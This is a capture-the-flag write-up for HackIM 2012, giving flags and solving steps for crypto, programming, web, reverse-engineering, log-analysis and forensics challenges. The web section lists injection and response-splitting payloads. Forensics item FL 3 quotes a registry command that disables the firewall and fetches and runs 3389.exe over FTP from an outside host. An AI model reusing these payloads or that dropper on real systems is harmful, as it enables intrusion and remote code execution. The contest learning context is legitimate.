HackIM 2012 Write up By Dhanesh ‘danny’ K
Trivia: As the name suggests, its all about seek n destroy :P
Trivia 1:
Q. This operating system also refers to a 1982 science fiction film, a board game, and a song off the
Prodigy B-Side "What Evil Lurks"
A. Android
Trivia 2:
Q. This fictional IPv4 packet header field was proposed in RFC 3514 as a means for identifying
packets with malicious intent.
A. evil bit
Trivia 3:
Q. This humorous RFC of the Internet Engineering Task Force describes a communication and control
protocol suite designed for allowing infinite numbers of monkeys with infinite numbers of
typewriters to produce the entire works of William Shakespeare.
A. RFC 2795
Trivia 4:
Q. Metasploit was originally coded for what purpose?
A. game
Trivia 5:
Q. Released on April 1st 2003, this esoteric programming language uses spaces, tabs and linefeeds to
compose commands.
A. whitespace
CRYPTO: We will mess with different algos and bang our head with messages which doesn’t make
any sense :D
Crypto 1:
Q. Oexjwok -333 lauiljt bwxylexk hilyruik krbf lk yfi frzlx jekbeqaexi bwzqwxixy. ofiui yfi QB blx kixj lx
iaibyueb kfwbs yfuwrgf yfi sitcwluj eh yfi frzlx jwik kwziyfexg yfly jwik xwy qailki Oexjwok, 2 Ceaa
Glyik
A. Windows 2000 already contains features such as the human discipline component, where the PC
can send an electric shock through the keyboard if the human does something that does not please
Windows. - Bill Gates
How to: Open the HTML source and you can see a commented HTML tag which points for mirrored
keyboard. The whole idea here is to map the keyboard in a different manner, in this case map the
keys from left hand side of the keyboard to right hand side of the keyboard.
Example: 0 is the 4th key from right hand side of the keyboard. So we will map it to 4th key from left
hand side of the keyboard which is 3.
If you keep on same procedure you can get the decrypted text.
Crypto 2:
Q. White noise
A. Error Message: Your Password Must Be at Least 18770 Characters and Cannot Repeat Any of Your
Previous 30689 Passwords - MS KB 276304
How to: The given document contains spaces and tabs. So you can easily guess that there are only
two states, and from that deduce it as binary. Replace space with 1 and tabs with 0, you will get a
long binary string. You can take 8bits and convert to HEX/ASCII to get the final string.
Crypto 3:
Q. Base test
A. duoTriGeSimalandNgiti
How to: From the page source, you will get the encoded text as
5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ
From the looks of the text, you can assume it as either base32 or baes36. From trying it with the
decoders, it is base32 but the text is reversed. So you have to reverse the given text, then feed it to
base32 decoder to get yet again a base32 encoded text. Decoding that one will give you the final
flag.
http://en.wikipedia.org/wiki/Base32 , http://sourceforge.net/projects/cyoencode/
Crypto 4:
Q. Elucidate
A.
onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavingelu
cidatedthenormalcourseofthephenomena
How to: Given text is a php script, encoded/obfuscated. The methodology used to understand the
script is to replace evals with echos so that we will get intermediate results. First look at the php
shows a base64 encoded text which will be decoded and evaled. So, we will decode the base64
encoded text to find out the next part. Next part is again obfuscated with weird variable names and
hex+octal encoded text. Its a repetitive job to decode the hex+octal encoded strings and replace the
variables to finally get a encoded + gzip compressed php script. After base64 decoding and gzip
inflating, we are presented with a code which does some kind of zip file creation and a unused
variable which has hex+octal encoded string. Echoing the string will give you the final flag.
<?php
$x=
"\x6f\156\x6c\171\x62\171\x6f\142\x73\145\x72\166\x69\156\x67\164\x68\151\x73\143\x6f\156
\x64\151\x74\151\x6f\156\x77\157\x75\154\x64\164\x68\145\x72\145\x73\165\x6c\164\x73\157
\x66\157\x75\162\x77\157\x72\153\x62\145\x72\145\x67\141\x72\144\x65\144\x61\163\x66\16
5\x6c\154\x79\143\x6f\156\x63\154\x75\163\x69\166\x65\141\x6e\144\x61\163\x68\141\x76\15
1\x6e\147\x65\154\x75\143\x69\144\x61\164\x65\144\x74\150\x65\156\x6f\162\x6d\141\x6c\14
3\x6f\165\x72\163\x65\157\x66\164\x68\145\x70\150\x65\156\x6f\155\x65\156\x61";
echo $x
?>
Crypto 5:
Q. Llun Saving Bank is fed up with known encryption standards to store the data. They decided to
reinvent the wheel. Can you decode the data?
A. Learn howto Hide in Plain Sight
How to: Looking at the page source you will find the hidden text. I spent considerable amount of
time on it to analyze and finally got a hint that its Steganography. Considering the usual
methodologies like LSB modification, wrote a script to dump the LSB of each character and convert it
into string to get the flag.
C# code for it-
private void btnDo_Click(object sender, EventArgs e)
{
string str = "Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOU
Omoipouenu/!Hs!Id!@ble- cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth @bme
and!Vimliog> Tidn Vhdobe Bnldui Ewhl>!Ir hd!Neitidr!@cmd!Oor
Villhnf>!Tidn!WHY!ball!him FOE? -!Dqhbtrusongnd";
string temp = string.Empty;
string flag = string.Empty;
for (int i = 0; i < str.Length; i++)
{
temp += (str[i] & 1).ToString();
if (temp.Length % 8 == 0)
{
flag += Convert.ToChar(Convert.ToInt32(temp, 2)).ToString();
temp = string.Empty;
}
}
MessageBox.Show(flag);
}
Programming: Write code bud, write code!!
Programming 1:
Q. Mfp ey zwvo fvat rjx hwprdrr lb nawzh tnfpc: Anj icvlu, hjgy Kbffhg, zk hjp gm nso nntjj, phf sw
vawwhnwer, pcum nu oeq ewllxqmqit
A. Men at some time are masters of their fates: The fault, dear Brutus, is not in our stars, but in
ourselves, that we are underlings
How to: From the page source we know that the original text begins like Men at. From this hint its
very obvious that the given text is added the location value. Consider the text starts from index 0.
Then ‘M’ + 0, ‘e’ + 1 like that we will add the index value. To solve this I didn’t wrote any code.
Manually did till Men at some and googled for that part of the text and got the original text from
Julius Caesar
Programming 2:
Q. The Flag is the sum of all middle terms till first 1337 rows of Pascal's Triangle
A.
43659324741884237070936006832303643114239411987772786602066543431205872166674362
33239359631257671906424254797004032326756653034333310397082007259357870623427662
43246058781866709722670564598714565665945693435649886216003262864750806978655186
22537377534356455651048425097523734881838663157063304671110082383218294453737678
74422156015835789685633070319435688289548287438365157627110284786617099968029649
7
How to: Nothing much to think about, just go on and write code to printout Pascal’s triangle and
modify to find out the sum of the middle term. The issue when you are coding in C/C++/C# is that
after couple of addition you will hit the integer (32 or 64bit) limit. I am not a script kiddie (:P), so I
used a BigInteger library for C#. It is very slow when comparing to crypto level BigInt libraries, but
yeah it does work.
Lib: http://www.codeproject.com/Articles/36323/BigInt
C# codestatic void Main(string[] args)
{
int p = 1337;
int q = 0;
int x;
BigInt sum = BigInt.Parse("0");
BigInt binom = BigInt.Parse("0");
while (q < p)
{
for (x = 0; x <= q; ++x)
{
if ((x == 0) || (q == 0))
binom = 1;
else
binom = (binom * (q - x + 1)) / x;
if (x == q / 2)
{
sum += binom;
break;
}
}
q = q + 2;
}
Console.WriteLine(sum);
Console.ReadLine();
}
Programming 3:
Q. Your Brainfuck Sir ...
A. ...In fact, never ever use gets() or sprintf(), period. If you do we will send evil dwarfs after you..
How to: The given code is brainfuck interpretable. First thing I did was to run in a emulator (you can
get couple of them online or you can convert to C representation and run). The thing to notice here
is how well the BF code is formatted. Most of the time BF code is just a single line without any line
breaks. This suspicion made me to put output function of BF (.) after every line, which printed most
of the flag. Had to put couple of dots in start and end to make it as the real flag.
Programming 4:
Q. Substitute Problem
A. sedulously eschew obfuscatory hyperverbosity and prolixity 84 roedy green
How to: Given instruction are self explanatory. All you need is to code accordingly.
C# code –
private int SearchInNumbers(string s, string[] numbers)
{
int index = -1;
for (int i =0;i<numbers.Length;i++)
{
if (numbers[i] == s)
{
index = i;
break;
}
}
return index;
}
public void somelevel()
{
string inp = rchIn.Text;
//input from rich text box
string[] inl = inp.Split(' ');
string[] search = { " ", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j",
"k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z" };
string[] numbers = { "zero", "one", "two", "three", "four", "five", "six",
"seven", "eight", "nine", "ten", "eleven", "twelve", "thirteen", "fouteen", "fifteen",
"sixteen", "seventeen", "eigteen", "nineteen", "twenty", "twentyone", "twentytwo",
"twentythree", "twentyfour", "twentyfive", "twentysix" };
string temp = string.Empty;
string final = string.Empty;
foreach (string val in inl)
{
if (val != "00")
{
char v = (char)(Convert.ToInt32(val) + 'a' - 1);
temp += v.ToString();
}
else
{
int indx = SearchInNumbers(temp,numbers);
if (indx < 0)
//fcuk!!
{
MessageBox.Show(temp);
}
final += search[indx];
temp = string.Empty;
}
}
int ind = SearchInNumbers(temp, numbers);
final += search[ind];
string[] arr = final.Split(' ');
string ans = string.Empty;
foreach (string sar in arr)
{
ind = SearchInNumbers(sar, numbers);
if (ind < 0)
//I am lazy for integers :p
{
ans += "\"" + sar + "\"";
}
else
{
ans += search[ind];
}
}
rchOut.Text = ans;
//flag
}
Programming 5:
Q. A pinch of salt for your coffee, Sir?
A. b77313
How to: Get the hash for a small data like ‘1’ or ‘a’. After that use your favourite MD5 cracker to get
the salt. Note that salt is different for each user. I used barswf to bruteforce the salt successfully.
Web: So you think you know how the WWW work, eh?
Web 1:
Q. Can you view the bytes in password.asp from Me?
A. To get to next level you have to use this URL
http://www.nullcon.net/challenge/wlevel-1-proc.asp?input=password.asp%00.txt
More on it: http://projects.webappsec.org/w/page/13246949/Null%20Byte%20Injection
Web 2:
Q. Can you redirect ME to hackim.null.co.in?
A. http://www.nullcon.net/challenge/wlevel-2-proc.asp?page=%%20%0D%0AContentLength%3A%200%0A%0AHTTP/1.1%20302%20Moved%20Temporarily%0ALocation%3Ahackim.null.
co.in%0A HTTP/1.1
How to: Idea here is to redirect to another page via response splitting.
More on it: https://www.owasp.org/index.php/HTTP_Response_Splitting
Web 3:
Q. Login System
A. b3149ecea4628efd23d2f86e5a723472
How to: Register some account and see the output in source viewer
You can see the part admin:no. Our idea is to make an user with admin:yes.
Logging in with that user will give us the flag.
Web 4:
Q. Can You Get Me all the Data?
A. myworthinessisallmydoubthismeritallmyfearcontrastingwhichmyqualitydoeshoweverappear
How to: The given list is all the Presidents of India. After trying couple of things with SQL injection, it
shows all the content. Its an injection only, but its XPATH injection. There are multiple ways to
actually get the flag out of this level. Injection I used is something like this: '] | /* | /a[b='
Web 5:
Q. Do You Have What IT Takes to Break into the World's Most Secure Login System?
A. 47c1b025fa18ea96c33fbb6718688c0f
How to: Basic SQLi will give you errors like hacking attempt is detected. To bypass the check/filter,
you need to have some special kind of inputs like these: '<>'1
More on it: http://www.exploit-db.com/papers/18263/
Reverse Engineering: Think in reverse, you must!
RE 1:
Q. Basic Test
A. We could talk all day about what AutoHotKey can do for an online poker player
How to: Initial analysis of the downloaded exe showed that its a AutoHotKey compiled script. You
just need the reversing application which is readily available here:
http://www.autohotkey.com/download/Exe2Ahk.exe
You will get the .ahk file and can see the flag there.
RE 2:
Q. Ask nicely, it will give you what you want
A. AreYouHappyNow?
How to: Initially everyone was stuck at this level as nothing was interesting in the exe until the hint
of resource section came. The idea is to change EIP to starting of .rsrc and make sure that the section
is RWE (I was stuck here as by-default section was not writable). It has a self modifying code, which
will decrypt the rest of the code and show the flags memory in EAX after final decryption.
Couple of things learned – new get base address trick (other than call $+5 pop ebp):
http://skypher.com/wiki/index.php/Hacking/Shellcode/GetPC
RE 3:
Q. null Mobile Android App
A. Do not let what you cannot do interfere with what you can do.
How to: Started with disassembling with smali and dex2jar. Soon to find out that there is nothing
interesting in the code. Next thing to do is to unpack the apk file (which essentially is a zip file) and
see the folder structure. The hidden javascript and php files are in \res\raw. After opening the php
file found a packed javascript snippet, which upon deobfuscating gave the flag in function mikcah.
http://jsbeautifier.org
RE 4:
Q. Script2
A. Nature has neither kernel nor shell; she is everything at once
How to: This one made me to do and understand lot of gdb. I always escaped out of doing any nocode Linux debugging as I am not a great fan of text based debuggers as the level info a GUI based
debugger provides is enormous (GDB is very powerful, but the lack of a good GUI is a real pity).
Worry not, we have other ways to do it ;)
Given file is a X64 ELF binary, so you need a x64 Linux distro with gdb. After the initial check, I loaded
it into IDA64 and disassembled to get a look of the functionalities. Going through the code, you can
understand the decryption function it calls regularly to get the hidden text and info out of the
executable. Initial debugging gave me the first check, which checks for a particular date and time
and says its expired if the current date and time is more than the hardcoded value (again stored in
encrypted format). The decrypted value is in epoch time format. Change the system date and you
will be greeted with a cat command executed. At this time only thing u need to do is run the ltrace
with the script2 and pass –r and –S 100 to list all the calls and in the calls you will find the flag.
After finishing the challenge, I set out for digging a little deeper with GDB. Installed gdbserver and
attached to it from IDA to do a remote debugging from my Windows machine. And guess what, its
just AWSOME.
See the results here...
RE 5:
Q. Got Dumped :(
A. TheLastSamurai
How to: Given file is a Windows XP SP3 memory dump. You can load into windbg with needed
symbols and put !analyze –v to get the initial info about the crash, Its essentially crashing by
accessing 0xdeadbabe, which is being push ret ed from the code. Now we need the crashing
application which can be obtained by 2 ways, one easy and another hard.
Easy way to get stub.exe out of dmp file:
Using sos which is useful for managed (.NET) debugging. Use these function to dump all the exe and
dlls which are loaded at the time of dump file creation.
.load clr10\sos.dll
!sam folder_path
Now you have a proper stub.exe.
Hard way to get stub.exe out of dmp file:
Open the dmp file in hex editor and search for PE/MZ. You will eventually find stub.exe’s location
and copy paste large amount of hex into another file. Now open the new file in any PE editor like CFF
explorer to see the section size and remember that when an exe is loaded into memory, it loads in
virtual size, so there will be extra padding. You can manually copy paste the sections according to
raw size specified in header to finally get a proper exe out of dmp file.
After getting the stub.exe you can load into IDA to find the crashing function, which is supposed to
decrypt the string in the memory and show it via message box. You can see a lot of crashing code
like push 0xdeadbabe ret, and other like that. After loading the encrypted message into registers,
you can directly bypass the execution by changing EIP to decryption routine, which starts with xor
esi, esi GetCurrentProcess and GetProcessID calls. Please note that it was supposed to decrypt the
strings from the crashed instance, so when it calls GetProcessID, it should return the PID of the
crashed application. PID of crashed application can be retrieved from WinDbg (either looking
through PEB or just look at the status bar of windbg :P ) as 0xA60. The dumped stub.exe is not fully
fixed state, so when you load into debugger and break at EP, change EIP to the decryption function,
bypass the crashing code, patch the GetProcessID to return 0xA60. Then it will decrypt the flag and
will present you with the flag.
Log Analysis: Its just lot of data :/
LA 1:
Q. Basic
A. 6bb61e3b7bce0931da574d19d1d82c88
How to: From the report, it is easily visible
+ OSVDB-3268: GET /challenge/logically_insane/
enabled: /challenge/logically_insane/
: Directory indexing is
Going to that directory, it lists 2 file. AskMelater.asp seems to be interesting and right clicking and
saving to file gives us the format to get the flag.
http://www.nullcon.net/challenge/logically_insane/askmelater.asp?question=flag
LA 2:
Q. Mystery Password
A. ..Supp@..adm1n
How to: Given is a pcap file that you can open in wireshark and look into it. Its pretty straight
forward.
LA 3:
Q. Clever Intruder
A. contact.php 6666 192.168.0.107
How to: Used Kiwi log viewer to filter based on the source IP and found the necessary info in the last
entry. Contact.php is getting the command in base64 encoded format and if you decode it, you will
see the netcat and port.
LA 4:
Q. Exploited!!!
A. CVE-2005-1921
How to: From the log its fairly clear that we are attacking TikiWiki. Initial idea was to get all the CVE
ids associated with TikiWiki and try. But it eventually ended in frustration as it didn’t found the flag.
Next idea was to see the HTTP response code. As there were a lot of 404s and we are interested only
in 200s. It was fairly easy to find the few 200s out of all these junk data.
It was command execution vulnerability in PEAR XML RPC, which was found to be having id CVE2005-1921.
LA 5:
Q. Waat Laga Server
A. id
page
Tavis Ormandy Julien Tinnes
zuzana
How to: Thats a huge file!!! First thing I did was to run strings on that file which again made 26.3 MB
file and search around for the required vulnerabilities. Searching for different commands and
jargons like root, shell, /bin/sh, system, CVE, exploit will reveal a lot of information about last two
flags. For the first two flags one can look into GET and POST requests, which has response 200 and
figure out the vulnerabilities.
For finding the root password, you have to use hash cracker like John the ripper.
Forensics: Have you covered the tracks?
FL 1:
Q. Tum Agar Dhyan Se Baat Meri Suno
A. 12344346765
How to: As the question says, listen carefully. You notice the sound difference in some places. The
best way to analyze a sound issue is use tools like Audacity and hear the irregular place
carefully(slow motion :D). After hearing you will understand that the sound is reversed in those
places which were speaking the flag numbers.
FL 2:
Q. Andar Ch0r
A. 6924289
How to: Provided is a doc file. After dumping the strings and going through it arises the suspicion
that the provided file is XLS. Renaming the file extension and opening in Excel gives us a 1 worksheet
names Nullcon. From the text in the page, we are sure that we are in a correct direction. From the
strings we also know that there are actually 3 worksheets. From googling it was known that Excel
can have hidden worksheets, which can be uncovered by pressing ALT+F11 to launch VB plugin
(which is used for Macros). Hidden worksheet has our flag.
Fl 3:
Q. Not Guilty!
A. Shell
REG_SZ
c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open xxx.3322.org> cmd.txt&echo
feng>> cmd.txt&echo xxx>> cmd.txt&echo binary >> cmd.txt&echo get 3389.exe >> cmd.txt&echo
bye >> cmd.txt&ftp -s:cmd.txt&3389.exe&3389.exe&del cmd.txt /q
How to: Using reglookup-recover gets the deleted registry.
http://manpages.ubuntu.com/manpages/jaunty/man1/reglookup-recover.1.html
FL 4:
Q. Intriguing MBR
A.
How to:
Tools needed: http://www.garykessler.net/software/index.html
Info: http://en.wikipedia.org/wiki/GUID_Partition_Table
First run of GPTparser says that there are 0 partition tables.
So, now we know that the no of partition table is located at offset 592 (80+512). Now the question is
how many table entries are there in this given image? To get that info, open the given file in a hex
editor and you can easily see a pattern. Count the no. of patterns and you have number of partitions
as 9. Now change the byte 592 (0x250) to 9 and again parse with GPTparser.pl.
After parsing the modified file, you will get a list of partition info with LBA addresses. Only thing now
to do is arrange in an incrementing manner of LBA, find out the partition type from the GUID given
by the parser (match with the wiki article) and you have the flag 
FL 5:
Q. Universal Swindlers Bayonet
A. 2GEL32TN
05/01/2012 18:54:36
06/01/2012 17:52:13
mshearts.exe
How to: Volatility for the help. Finding first 3 flags are trivial as we can dump every registry and look
for USBSTOR to find it. You have to change the time to IST (add 5:30) and format it properly. For the
last flag, I dumped the process nullcon.exe and ran strings over it to find a list of exe names and
bruteforced the suspicious ones to find mshearts.exe as the right one.
https://www.volatilesystems.com/default/volatility